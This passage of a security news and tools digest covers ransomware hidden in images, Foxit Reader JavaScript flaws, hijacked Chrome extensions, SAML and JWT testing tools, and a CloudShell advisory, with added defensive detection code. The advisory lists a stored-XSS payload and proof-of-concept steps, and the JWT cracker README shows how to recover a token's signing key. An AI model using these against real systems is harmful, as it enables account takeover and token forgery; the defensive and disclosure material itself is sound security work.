The distribution of this ransomware is highly effective because of its ability to bypass detection. According to Abrams, only one of the 58 vendors in VirusTotal could detect the malicious images at the time of analysis. Sync.exe, on the other hand, had a detection rate of 28 out of 63.

To stay protected, users should take extra care when opening attachments or clicking on URLs in emails received from unknown sources. They should also keep their files backed up at all times, to ensure they can recover their data without having to pay a ransom. Keeping all software on the machine updated at all times should decrease the chances of becoming infected.

Source: http://www.securityweek.com/synccrypt-ransomware-hides-components-image-files
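The reason the images pass as harmless is that an image decoder stops at the end of the picture data, while a ZIP reader locates its central directory from the end of the file, so one file can satisfy both. Checking whether anything follows the image's natural end marker is a cheap detection for this kind of polyglot. The example below is added for this post and is not from the BleepingComputer analysis or from the malware; the PNG and the appended archive are constructed in memory, with the member names taken from the article.

```python
"""
Detect a ZIP archive appended to an image (the SyncCrypt delivery trick).
Added example code for this post; the image and the archive are constructed.
"""
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SIG = b"\xff\xd8\xff"
ZIP_LOCAL_HDR = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"


def image_end(data):
    """Offset just past the last byte a decoder needs, or None for unknown formats."""
    if data.startswith(PNG_SIG):
        pos = len(PNG_SIG)
        while pos + 8 <= len(data):            # walk chunks: length, type, data, crc
            length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
            pos += 8 + length + 4
            if ctype == b"IEND":
                return pos
        return None
    if data.startswith(JPEG_SIG):
        eoi = data.rfind(b"\xff\xd9")           # End Of Image marker
        return eoi + 2 if eoi != -1 else None
    return None


def find_appended_archive(data):
    """Return the offset of a ZIP hidden after the image, or None."""
    end = image_end(data)
    if end is None or end >= len(data):
        return None
    trailer = data[end:]
    if trailer.startswith(ZIP_LOCAL_HDR) or ZIP_EOCD in trailer:
        return end
    return None


def list_hidden_zip(data):
    """Names of the files inside the appended ZIP (empty list if none)."""
    if find_appended_archive(data) is None:
        return []
    # zipfile finds the end-of-central-directory record from the end of the
    # buffer and compensates for the prepended image bytes by itself.
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def _png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png():
    """A minimal valid 1x1 RGB PNG (constructed)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")   # filter byte + one red pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


def make_polyglot(image, members):
    """Append a ZIP holding `members` ({name: bytes}) to `image` (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return image + buf.getvalue()


CLEAN_PNG = make_png()
POLYGLOT_PNG = make_polyglot(CLEAN_PNG, {"sync.exe": b"placeholder, not a real binary",
                                         "readme.html": b"<html>placeholder note</html>"})

if __name__ == "__main__":
    print("clean image:", find_appended_archive(CLEAN_PNG))
    print("polyglot:", find_appended_archive(POLYGLOT_PNG), list_hidden_zip(POLYGLOT_PNG))
```

Run on a download proxy or mail gateway, the same check flags any image whose trailer starts with a ZIP local header or contains an end-of-central-directory record, regardless of which image format carries it; the PNG walker and the JPEG marker search are the two formats handled here.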
  14. add IMEI here https://imei.org/results/?_h=93F2648CCE7FE812420E2C3C5FE5C2B18AAFE3873872AF489C85DF1D39EDB2A6
  15. Are you using Foxit PDF Reader? If yes, then you need to watch your back.

Security researchers have discovered two critical zero-day security vulnerabilities in Foxit Reader software that could allow attackers to execute arbitrary code on a targeted computer, if it is not configured to open files in the Safe Reading Mode.

The first vulnerability (CVE-2017-10951) is a command injection bug discovered by researcher Ariele Caltabiano working with Trend Micro's Zero Day Initiative (ZDI), while the second bug (CVE-2017-10952) is a file write issue found by Offensive Security researcher Steven Seeley.

An attacker can exploit these bugs by sending a specially crafted PDF file to a Foxit user and enticing them to open it.

Foxit refused to patch both the vulnerabilities because they would not work with the "safe reading mode" feature that fortunately comes enabled by default in Foxit Reader.

However, researchers believe building a mitigation doesn't patch the vulnerabilities completely, which, if they remain unpatched, could be exploited if attackers find a way to bypass safe reading mode in the near future.

Both unpatched vulnerabilities can be triggered through the JavaScript API in Foxit Reader.

CVE-2017-10951: The command injection bug resides in the app.launchURL function, which executes strings provided by attackers on the targeted system due to lack of proper validation, as demonstrated in the video given below.

CVE-2017-10952: This vulnerability exists within the "saveAs" JavaScript function that allows attackers to write an arbitrary file on a targeted system at any specific location, as demonstrated in the video given below.

If you are one of those using Foxit Reader and PhantomPDF, ensure you have the "Safe Reading Mode" feature enabled. Additionally, you can also uncheck the "Enable JavaScript Actions" option in Foxit's Preferences menu, although this may break some functionality.

Users are also recommended always to be vigilant while opening any files they receive via email. Just recently, we reported how opening a malicious PowerPoint file could compromise your computer with malware. So, always beware of phishing emails, spam, and clicking on malicious attachments.

Source: https://thehackernews.com/2017/08/two-critical-zero-day-flaws-disclosed.html
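Both bugs are reached through JavaScript actions inside the document, so a gateway can triage PDFs before they reach a reader by extracting every `/JS` string and looking for the two API names the article mentions, plus any open-time trigger. The example below is added for this post and is not Foxit's, ZDI's or the researchers' code; it reads raw objects only and does not inflate compressed object streams, so a clean result is not proof of absence. The sample PDFs are constructed and contain only the function names, not an exploit.

```python
"""
Static triage of a PDF for JavaScript actions. Added example code for this
post (not Foxit's or ZDI's); sample documents are constructed.
"""
import re

WATCHLIST = ("app.launchURL", "saveAs")          # API names from the post
JS_KEY = re.compile(rb"/JS\s*")                  # dictionary key holding script text
AUTO_RUN = re.compile(rb"/OpenAction|/AA\b")     # document-open / additional-action triggers


def _read_literal(buf, start):
    """Parse a PDF literal string beginning at buf[start] == b'('.

    Parentheses may nest unescaped; a backslash escapes the next byte (escape
    sequences are reduced to the escaped byte, which is enough for triage).
    Returns (string_bytes, index_after_closing_paren).
    """
    depth, i, out = 0, start, bytearray()
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\" and i + 1 < len(buf):
            out += buf[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
            out += c
        else:
            out += c
        i += 1
    return bytes(out), i


def extract_js(pdf_bytes):
    """All JavaScript strings stored under /JS keys (literal or hex), as text."""
    scripts = []
    for m in JS_KEY.finditer(pdf_bytes):
        i = m.end()
        if pdf_bytes[i:i + 1] == b"(":
            raw, _ = _read_literal(pdf_bytes, i)
        elif pdf_bytes[i:i + 1] == b"<":
            end = pdf_bytes.find(b">", i)
            hexdigits = re.sub(rb"\s", b"", pdf_bytes[i + 1:end]).decode("ascii")
            raw = bytes.fromhex(hexdigits + "0" * (len(hexdigits) % 2))  # odd length padded per spec
        else:
            continue                              # indirect reference or stream: out of scope here
        scripts.append(raw.decode("latin-1"))
    return scripts


def triage_pdf(pdf_bytes):
    """Summarise why the file deserves a closer look before it reaches a reader."""
    scripts = extract_js(pdf_bytes)
    return {
        "has_javascript": bool(scripts) or b"/JavaScript" in pdf_bytes,
        "runs_on_open": AUTO_RUN.search(pdf_bytes) is not None,
        "watchlist_hits": sorted({api for s in scripts for api in WATCHLIST if api in s}),
        "scripts": scripts,
    }


def _pdf_with_script(js, hex_encoded=False):
    """Minimal PDF whose OpenAction runs `js` (constructed; xref table omitted)."""
    value = b"<" + js.hex().encode("ascii") + b">" if hex_encoded else b"(" + js + b")"
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
            b"4 0 obj << /S /JavaScript /JS " + value + b" >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")
ALERT_PDF = _pdf_with_script(b"app.alert('hello');")
LAUNCH_PDF = _pdf_with_script(b"app.launchURL('https://example.invalid/', true);")
SAVEAS_PDF = _pdf_with_script(b"this.saveAs('placeholder.txt');", hex_encoded=True)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_PDF), ("alert", ALERT_PDF),
                      ("launch", LAUNCH_PDF), ("saveas", SAVEAS_PDF)):
        print(name, triage_pdf(doc))
```

The hex-string path matters because `/JS <...>` is a legal spelling of the same action and is the obvious way to slip past a scanner that only greps for the function name in clear text; the balanced-parenthesis reader matters because real scripts contain `)` characters, which a naive regex would stop at.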
  16. More than 4.7 million users were apparently exposed to potentially malicious ads and credential theft after cybercriminals managed to hijack the developer accounts of several popular Chrome extensions.

The actors used phishing emails to gain access to the developers' Google accounts and submit to the Chrome Web Store malicious versions of legitimate extensions. The malicious code injected in these tools was meant to modify the advertisements displayed to users and to grab specific credentials from the victims' machines.

After taking a closer look at the incidents, Proofpoint concluded that 8 Chrome extensions have been compromised by the actor using the same modus operandi:

- Web Developer
- Chrometana
- Infinity New Tab
- CopyFish
- Web Paint
- Social Fixer
- TouchVPN
- Betternet VPN

At the moment, these extensions have a combined user base of more than 4.77 million users.

As previously reported, the phishing attack to compromise the developer accounts was pretty straightforward: an email purporting to come from Google Support prompted the targeted developers to log into their accounts to update some information. The login link in the email, however, would take developers to the attacker's site instead, resulting in their credentials being stolen.

Next, the attackers would take over the compromised developer account and/or hijack their Chrome extension to replace it with a malicious variant.

According to Proofpoint, the actor included in the code a check to ensure the extension has been installed for at least 10 minutes before starting the malicious behavior, most probably in an attempt to bypass detection. The malicious code was also observed attempting to retrieve a remote file called ga.js over HTTPS, from a domain generated via a domain generation algorithm (DGA).

Analysis of the malicious components in Web Developer revealed that the code from this step was meant to conditionally call additional scripts, including some that would harvest Cloudflare credentials after the victim's login.

Next, "the compromised version of the extension attempts to substitute ads on the victim's browser, hijacking traffic from legitimate advertising networks," Proofpoint says, adding that the attackers focused mainly on carefully crafted substitution ads on adult websites, although they targeted a variety of other websites as well.

The ad substitutions work for 33 popular banner sizes including 468x60, 728x90, and many more spanning numerous aspect ratios, the researchers say. In many instances, the victims were presented with fake JavaScript alerts claiming that the computer required repairing. Clicking on these ads would redirect users to affiliate programs from which the threat actors could profit.

Proofpoint observed the compromised Web Developer extension directing victims to two such affiliates, but says that others may also have been used. The popup alerts were also associated with the compromise of the Infinity New Tab extension in May 2017, as well as with fake EU cookie-consent alerts last year.

Via http://www.securityweek.com/hijacked-extensions-put-47-million-chrome-users-risk
  17. HBO doesn't need hackers to leak its widely watched "Game of Thrones" episodes, as it is sufficiently capable of leaking them on its own.

In what seems to be a terrible blunder, HBO Spain appeared to have accidentally broadcast the next episode (Episode 6) of Game of Thrones season 7 five days before its official premiere. And as expected, the GoT episode 6 quickly began circulating online.

HBO has recently been facing trouble from a hacker or group of hackers who claimed to have obtained nearly 1.5 terabytes of information from the entertainment company.

Late last month, the unknown hackers dropped upcoming episodes of "Ballers" as well as "Room 104," along with a script of the fourth episode of "Game of Thrones" on the internet.

The leak was followed by another dump of a half-gigabyte sample of stolen HBO data, including HBO's emails, employment agreements, and balance sheets, along with the script of the upcoming Game of Thrones episode, demanding a ransom of nearly $6 Million in Bitcoins.

A recently leaked screenshot of an email from an HBO executive also suggested that the company offered hackers $25,000 and requested them to extend the ransom payment deadline by one week.

Sadly, the proposal apparently failed to satisfy the desires of HBO hackers, and they threatened to release more data from its 1.5 terabytes of stolen data every Sunday until the complete ransom of millions of dollars was paid.

However, the recent leak has nothing to do with hackers; rather, the new unreleased episode was accidentally broadcast by HBO Nordic in Spain for about an hour before it was removed, first spotted by Reddit users. The new GOT episode was purportedly available via HBO's Spanish on-demand service.

Here's what HBO has to say about the latest leak:

Short footage and GIFs from GOT S07E06 have started circulating on YouTube, Reddit, Instagram, Twitch and other streaming services.

Episode 6 of "Game of Thrones" will officially premiere on Sunday at 9 p.m. on HBO.

Via https://thehackernews.com/2017/08/game-of-thrones-season7.html
  18. PyStat - Advanced Netstat For Windows

Features:
- Know the remote address of a process
- Know the remote ports of a process
- Know which user is using a process, along with title & PID

Changelogs:
- Auto install of python modules support added in install.py

Installation Guide
- Download the .zip file
- Extract the pystat folder from the .zip file to some drive, i.e. C:\tools\pystat
- Go to C:\tools\pystat
- Press SHIFT KEY + RIGHT CLICK and select "Open Command Window here"
- Enter this command: python install.py
- Enjoy

Warning! Don't move the pystat folder after installation, or it will stop working

Download PyStat-master.zip
Source: https://github.com/roothaxor/PyStat
  19. AUTHENTICATION SERVER

The idea behind Isolate is that we should somehow manage how people get access to our servers. How can we make this process more secure? How could we prevent a system from being compromised when someone loses the laptop with the ssh key? What would we do in case someone quits the company; is there an alternative to just changing all passwords, keys, etc.?

Isolate adds OTP 2FA to SSH login. It could be a hardware YubiKey or the Google Authenticator app. If someone loses the password, the OTP key is still here and the intruder can't get access to the bastion host. Users don't get direct access to endpoint servers; they go there through the Isolate server, and the system tracks their actions. You can easily manage access to the bastion server: add/remove users, etc.

Technically you should generate and place the bastion host key on endpoint servers, and users will get regular access to the Isolate server with sudoer access to the ssh command. Once they want to connect to the endpoint server, the system executes the ssh command, and the ssh client running with privileged user permissions gets the server key and uses it to access the server we need to get access to.

Supports
- OTP (counter and time based) 2FA algorithms
- SSH sessions logging

Requirements
- Fresh CentOS 7 / Ubuntu 16.04 / Debian 9 setup
- Ansible 2.3+ for install or update

Installation
https://github.com/itsumma/isolate#install

Download isolate-master.zip
Source: https://github.com/itsumma/isolate
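The two OTP families the post lists (counter based and time based) are HOTP (RFC 4226) and TOTP (RFC 6238). Written out, they are a short HMAC truncation plus the verification rules a bastion host has to apply: a small drift window for TOTP, and a persisted, strictly increasing counter for HOTP so that a replayed code fails. The block below is an added example for this post, not Isolate's own code; it is checked against the published RFC test vectors, whose shared secret is the ASCII string "12345678901234567890".

```python
"""
HOTP (RFC 4226) and TOTP (RFC 6238) with the login-time verification rules.
Added example code for this post, not Isolate's implementation.
"""
import hashlib
import hmac
import struct
import time

RFC_SECRET = b"12345678901234567890"      # reference secret from both RFCs' test vectors


def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """HMAC-based OTP: dynamically truncate HMAC(secret, counter) to decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F                                 # RFC 4226 section 5.3
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, unix_time=None, step=30, digits=6, digestmod=hashlib.sha1):
    """Time-based OTP: HOTP over the number of `step`-second windows since the epoch."""
    if unix_time is None:
        unix_time = time.time()
    return hotp(secret, int(unix_time) // step, digits, digestmod)


def verify_totp(secret, candidate, unix_time=None, window=1, step=30, digits=6):
    """Accept the current window or up to `window` steps either side (clock drift).

    The comparison is constant-time so the check leaks nothing about how many
    digits matched.
    """
    if unix_time is None:
        unix_time = time.time()
    if not (candidate.isdigit() and len(candidate) == digits):
        return False
    counter = int(unix_time) // step
    return any(hmac.compare_digest(hotp(secret, counter + skew, digits), candidate)
               for skew in range(-window, window + 1))


def verify_hotp(secret, candidate, last_counter, look_ahead=10, digits=6):
    """Counter-based check: accept the first match after `last_counter` within the
    look-ahead window and return the new counter to persist, else None.
    Persisting the returned counter is what makes a replayed code fail.
    """
    for counter in range(last_counter + 1, last_counter + 1 + look_ahead):
        if hmac.compare_digest(hotp(secret, counter, digits), candidate):
            return counter
    return None


if __name__ == "__main__":
    print([hotp(RFC_SECRET, c) for c in range(3)])   # RFC 4226 Appendix D vectors
    print(totp(RFC_SECRET, 59, digits=8))            # RFC 6238 Appendix B vector
```

Note that the server side never stores or compares the code itself; it recomputes it from the shared secret, which is why losing a password alone (as the post says) does not get an intruder past the bastion, and why the secret must be provisioned to the user's device over a trusted channel.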
  20. Do you really not notice that I'm not paying attention to you?!
  21. Description

SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: manipulating SAML messages and managing X.509 certificates.

This software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the Hochschule für Technik Rapperswil (HSR). Our project partner and advisor was Compass Security Schweiz AG. We thank Compass for the nice collaboration and support during our bachelor thesis.

Features

The extension is divided in two parts: a SAML message editor and a certificate management tool.

Message Editor

Features of the SAML Raider message editor:
- Sign SAML Messages
- Sign SAML Assertions
- Remove Signatures
- Edit SAML Message (Supported Messages: SAMLRequest and SAMLResponse)
- Preview eight common XSW Attacks
- Execute eight common XSW Attacks
- Send certificate to SAML Raider Certificate Management
- Undo all changes of a SAML Message
- Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile
- Supported Bindings: POST Binding, Redirect Binding, SOAP Binding, URI Binding

Certificate Management

Features of the SAML Raider Certificate Management:
- Import X.509 certificates (PEM and DER format)
- Import X.509 certificate chains
- Export X.509 certificates (PEM format)
- Delete imported X.509 certificates
- Display information of X.509 certificates
- Import private keys (PKCS#8 in DER format and traditional RSA in PEM format)
- Export private keys (traditional RSA Key PEM format)
- Cloning X.509 certificates
- Cloning X.509 certificate chains
- Create new X.509 certificates
- Edit and self-sign existing X.509 certificates

Download: saml-raider-1.2.1.jar
Installation: https://github.com/SAMLRaider/SAMLRaider#installation
Source: https://github.com/SAMLRaider/SAMLRaider
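The XSW (XML Signature Wrapping) attacks the extension previews all exploit one gap on the relying-party side: the code that verifies the signature and the code that reads the assertion pick different elements. The structural checks that close that gap are shown below as an added example for this post; it is not SAML Raider's code. Cryptographic verification of the signature (canonicalization, digest and key checks) is assumed to happen elsewhere and is stood in for by the placeholder `signature_is_valid`; the responses are constructed and carry placeholder signature values.

```python
"""
Relying-party checks against XML Signature Wrapping in a SAML Response.
Added example code for this post, not SAML Raider's own; samples constructed.
"""
import xml.etree.ElementTree as ET

NS = {
    "saml2p": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml2": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}


def signature_is_valid(signature_element):
    """Placeholder for real XML-DSig verification (assumed to be done elsewhere)."""
    return signature_element is not None


def select_signed_assertion(xml_text):
    """Return (assertion ID, subject NameID) for the one Assertion that may be trusted.

    Rules: exactly one Assertion anywhere in the Response; the Signature must be
    a direct child of that Assertion (enveloped); every Reference URI in it must
    point at that Assertion's own ID. Anything else is treated as wrapping.
    """
    root = ET.fromstring(xml_text)
    assertions = root.findall(".//saml2:Assertion", NS)       # any depth, incl. ds:Object
    if len(assertions) != 1:
        raise ValueError("expected exactly one Assertion, found %d" % len(assertions))
    assertion = assertions[0]
    signature = assertion.find("ds:Signature", NS)            # direct child only
    if signature is None or not signature_is_valid(signature):
        raise ValueError("assertion is not enveloped-signed")
    uris = {ref.get("URI") for ref in signature.findall("ds:SignedInfo/ds:Reference", NS)}
    if uris != {"#" + assertion.get("ID", "")}:
        raise ValueError("signature references %s, not this assertion" % sorted(uris))
    return assertion.get("ID"), assertion.findtext("saml2:Subject/saml2:NameID", namespaces=NS)


def _response(*assertions):
    return ('<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" '
            'xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" '
            'xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_resp">'
            + "".join(assertions) + "</saml2p:Response>")


def _assertion(aid, name, signed=True, ref=None):
    """Constructed assertion; `ref` lets a signature claim a different ID than its own."""
    ref = ref or aid
    sig = ('<ds:Signature><ds:SignedInfo><ds:Reference URI="#' + ref + '"/></ds:SignedInfo>'
           '<ds:SignatureValue>placeholder</ds:SignatureValue></ds:Signature>') if signed else ""
    return ('<saml2:Assertion ID="' + aid + '">' + sig +
            '<saml2:Subject><saml2:NameID>' + name + '</saml2:NameID></saml2:Subject></saml2:Assertion>')


# Constructed: a normal response; one that keeps the signed assertion but adds an
# unsigned one; and one whose signature points at an ID other than its own.
GOOD_RESPONSE = _response(_assertion("_a1", "alice"))
WRAPPED_RESPONSE = _response(_assertion("_evil", "admin", signed=False), _assertion("_a1", "alice"))
MISREFERENCED_RESPONSE = _response(_assertion("_evil", "admin", ref="_a1"))

if __name__ == "__main__":
    print(select_signed_assertion(GOOD_RESPONSE))
    for bad in (WRAPPED_RESPONSE, MISREFERENCED_RESPONSE):
        try:
            select_signed_assertion(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The order matters: count first, then locate the signature relative to the element you are about to trust, then check the reference, and only then pass that same element object to the crypto layer. Verifying "a" signature anywhere in the document and then reading "an" assertion by XPath is exactly what the eight XSW variants exploit.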
  22. JWT cracker

A multi-threaded JWT brute-force cracker written in C. If you are very lucky or have a huge computing power, this program should find the secret key of a JWT token, allowing you to forge valid tokens. This is for testing purposes only, do not put yourself in trouble. I used the Apple Base64 implementation that I modified slightly.

Compile

Make sure you have openssl's headers installed. On Ubuntu you can install them with apt-get install libssl-dev

make

If you use a Mac, you can install OpenSSL with brew install openssl, but the headers will be stored in a different location:

make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib

Run

$ > ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE

In the above example, the key is Sn1f. It takes approximately 2 seconds to crack on my Macbook.

Contribute

- No progress status
- If you stop the program, you cannot start back where you were

IMPORTANT: Known bugs

The base64 implementation I use (from Apple) is sometimes buggy because not every Base64 implementation is the same. So sometimes, decrypting of your Base64 token will only work partially and thus you will be able to find a secret to your token that is not the correct one. If someone is willing to implement a more robust Base64 implementation, that would be great.

Download c-jwt-cracker-master.zip
Source: https://github.com/brendan-rius/c-jwt-cracker
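A four-character secret like the one in the README's example falls in seconds because HS256 is just HMAC-SHA256 over the first two segments; the cracker has nothing to find when the consumer enforces a secret at least as long as the MAC output. The block below is an added example for this post (not the c-jwt-cracker project's code) showing the consumer-side rules: pin the algorithm instead of trusting the token's own `alg`, refuse short secrets, decode base64url without padding correctly (the edge case the bug note above runs into), and compare MACs in constant time. The secret is constructed.

```python
"""
HS256 JWT signing/verification with the checks that deny a brute-forcer a
cheap target. Added example code for this post; DEMO_SECRET is constructed.
"""
import base64
import hashlib
import hmac
import json

MIN_HS256_SECRET_BYTES = 32      # HMAC-SHA256 output size; RFC 7518 section 3.2 minimum key length


def b64url_decode(segment):
    """base64url with the '=' padding stripped, as JWT requires: restore it first."""
    if isinstance(segment, str):
        segment = segment.encode("ascii")
    return base64.urlsafe_b64decode(segment + b"=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(claims, secret):
    """Mint a compact HS256 token; refuses a secret shorter than the MAC output."""
    if len(secret) < MIN_HS256_SECRET_BYTES:
        raise ValueError("refusing to sign with a weak secret")
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = (header + "." + body).encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return header + "." + body + "." + b64url_encode(sig)


def verify_hs256(token, secret):
    """Return the claims if `token` is a valid HS256 JWT under `secret`, else None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    # Algorithm pinning: the verifier decides the algorithm, never the token.
    # 'none' and public-key-as-HMAC-secret confusions are both rejected here.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = (header_b64 + "." + body_b64).encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    try:
        return json.loads(b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return None


DEMO_SECRET = b"constructed-demo-secret-0123456789abcdef"      # 40 bytes, example only

if __name__ == "__main__":
    token = sign_hs256({"sub": "1234567890", "admin": False}, DEMO_SECRET)
    print(token)
    print(verify_hs256(token, DEMO_SECRET))
```

The padding arithmetic in `b64url_decode` is the whole fix for the class of problem the bug note describes: segment lengths of 2 or 3 modulo 4 are normal in JWTs, and a decoder that rejects or mis-handles them makes the cracker compare against the wrong bytes.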
  23. Quali CloudShell version 7.1.0.65.08 (Patch 6) suffers from multiple persistent cross site scripting vulnerabilities.

# Vulnerability type: Multiple Stored Cross Site Scripting
# Vendor: Quali
# Product: CloudShell
# Affected version: v7.1.0.6508 (Patch 6)
# Patched version: v8 and up
# Credit: Benjamin Lee
# CVE ID: CVE-2017-9767

==========================================================

# Overview
Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform; this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.

==========================================================

# Vulnerable URL 1 (Reservation Function)
/RM/Reservation/ReserveNew

# Vulnerable parameter(s)
- Name
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT
- Go to the "Inventory" tab
- Click on the details button on either of the items
- Click on the reserve button and enter the XSS payload into the affected parameters
- Add users to the permitted user list (e.g. admin accounts)
- Once the user clicks on the reservation list details, the XSS would be executed

==========================================================

# Vulnerable URL 2 (Environment Function)
/RM/Topology/Update

# Vulnerable parameter(s)
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT
- Go to the "Environment" tab
- Click on the item properties button
- Enter the XSS payload into the affected parameters
- Change the owner to another user (e.g. admin accounts)
- Once the user clicks on the more info button of the item in the environment tab, the XSS would be executed

==========================================================

# Vulnerable URL 3 (Job Scheduling Function)
/SnQ/JobTemplate/Edit?jobTemplateId=<job template id>

# Vulnerable parameter(s)
- Name
- Description
- ExecutionBatches[0].Name
- ExecutionBatches[0].Description
- Labels

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT
- Go to the "Job Scheduling > Add New Suite" tab
- Enter the XSS payload into the affected parameters
- Once the user views the details of this suite, the XSS would be executed

==========================================================

# Vulnerable URL 4 (Resource Template Function)
/RM/AbstractTemplate/AddOrUpdateAbstractTemplate

# Vulnerable parameter(s)
- Alias
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT
- Go to the "Inventory > abstract template > Add New" tab
- Enter the XSS payload into the affected parameters
- Once the user clicks on the more info button of the item, the XSS would be executed

==========================================================

# Timeline
- 06/06/2017: Vulnerability found
- 20/06/2017: Vendor informed
- 20/06/2017: Vendor responded and acknowledged
- 16/07/2017: Vendor fixed the issue
- 12/08/2017: Vendor agreed on public disclosure
- 14/08/2017: Public disclosure

https://packetstormsecurity.com/files/143746/Quali-CloudShell-7.1.0.6508-Patch-6-Cross-Site-Scripting.html
  24. A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office.

The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface, for which a patch was issued in April this year, but threat actors are still abusing the flaw through different mediums.

Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file.

According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider, and mainly targets companies involved in the electronics manufacturing industry.

Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department.

Here's How the Attack Works:

The complete attack scenario is listed below:

Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request.

Step 2: Once executed, the PPSX file calls an XML file programmed in it to download the "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature.

Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system.

Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which, when installed, allows attackers to control infected computers remotely from their command-and-control server.

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world, with capabilities like download-and-execute commands, a keylogger, a screen logger, and recorders for both webcam and microphone.

Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focus on the RTF. So, the use of new PPSX files allows attackers to evade antivirus detection as well.

The easiest way to prevent yourself completely from this attack is to download and apply the patches released by Microsoft in April that address the CVE-2017-0199 vulnerability.

Source
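Step 2 above is where the PPSX delivery differs from the RTF one the existing detections look for, and it is also where it is visible before anything runs: an Office Open XML package is a ZIP of XML parts, and every target the document reaches outside itself is declared in a `.rels` part as a `Relationship` with `TargetMode="External"`. Listing those relationships is a cheap triage step for mail gateways. The block below is an added example for this post, not Trend Micro's tooling; the packages are constructed with just enough parts to carry a slide's relationships, remote.example is a placeholder host, and they contain no exploit.

```python
"""
List external relationships in an OOXML package (PPSX/PPTX/DOCX/XLSX) and
flag ones that fetch from a remote location. Added example code for this
post, not Trend Micro's; sample packages constructed.
"""
import io
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(ooxml_bytes):
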